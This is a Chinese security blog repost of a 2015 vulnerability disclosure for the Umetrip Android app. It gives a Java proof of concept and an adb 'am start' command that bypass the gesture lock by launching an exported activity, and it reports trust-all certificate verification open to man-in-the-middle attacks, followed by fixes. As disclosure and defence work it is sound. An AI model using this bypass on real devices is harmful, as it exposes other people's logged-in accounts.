记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

航旅纵横手势锁轻易绕过及其它漏洞

2015-08-10 18:55

测试版本:航旅纵横android客户端v2.5.5,最新版本



1、该版本可以设置手势锁功能来对本地用户进行认证,然而该功能却可以通过启动导出的activity轻易绕过。利用POC如下:

code 区域
public void activityStart(View v) {



ComponentName componetName = new ComponentName("com.umetrip.android.msky.app","com.umetrip.android.msky.activity.MainActivity");

try {

Intent intent = new Intent();

intent.setComponent(componetName);

startActivity(intent);

} catch (Exception e) {

Toast.makeText(getApplicationContext(), "Not found", 0).show();

}

}



或者直接在adb shell中使用am进行测试

code 区域
am start com.umetrip.android.msky.app/com.umetrip.android.msky.activity.MainActivity





2、反编译发现存在多处信任所有证书漏洞,易遭受中间人攻击。

漏洞证明:

1、手势锁绕过

正常情况下,需要解开手势锁后登录

lock.png



启动com.umetrip.android.msky.activity.MainActivity

code 区域
shell@klte:/ $ am start com.umetrip.android.msky.app/com.umetrip.android.msky.>

Starting: Intent { act=android.intent.action.MAIN cat=[android.intent.category.LAUNCHER] cmp=com.umetrip.android.msky.app/com.umetrip.android.msky.activity.MainActivity }



绕过手势锁,进入已登录账户的界面

bypass.png



2、信任所有证书

com.umetrip.android.msky.f.a.l类:使用

code 区域
setHostnameVerifier(SSLSocketFactory.ALLOW_ALL_HOSTNAME_VERIFIER)

信任所有证书

allow_all.png

修复方案:

1、默认手势锁解开以后的其他activity为非导出状态,或者使用权限保护。

2、建议使用setHostnameVerifier(SSLSocketFactory.STRICT_HOSTNAME_VERIFIER),详见

code 区域
http://drops.wooyun.org/tips/3296#more-3296


知识来源: www.wooyun.org/bugs/wooyun-2015-0111692

阅读:134392 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“航旅纵横手势锁轻易绕过及其它漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云